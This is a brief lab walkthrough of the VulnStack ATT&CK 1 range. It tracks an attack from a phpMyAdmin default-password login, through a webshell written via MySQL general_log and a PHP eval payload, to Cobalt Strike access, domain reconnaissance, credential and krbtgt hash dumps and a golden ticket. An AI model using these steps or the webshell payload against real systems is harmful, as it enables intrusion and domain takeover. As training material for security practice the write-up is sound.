VulnStack ATTCK 1 靶场

环境

信息收集

端口探测

Only 80, 3306 are open

目录扫描

Access port 80 and found that the home page is PHP probe:

Directory scan:

Discover phpmyadmin.

漏洞挖掘

phpmyadmin Try to log in with password:

root:root login is successful.

There are many ways to getshell in the phpmyadmin background

Let's first look at the regular select into outfile:

Here secure_file_priv is null, and writing and writing are not allowed.

Give up this method and try writing out the webshell by MySQL general_log.

First look at the configuration of global variables show global variables like '%general%':

The general log is not enabled here, so I will open it myself and save the file custom:

1

2

SET GLOBAL general_log='ON'

SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'

The absolute path here is obtained through the previous probe.

Then write webshell select '?php @eval($_POST['bbll]);':

Ant Sword Connection:

内网渗透

First check the number of system digits:

1

wmic cpu get addresswidth

Use cs to generate a Trojan and upload:

implement:

Going online, directly with administrator permissions:

View user permissions:

Check the current login domain:

View users within the domain:

View the host in the domain:

View Domain:

dump password:

横向移动

After DC is online, use hashdump dump krbtgt NTLM Hash:

Make golden notes: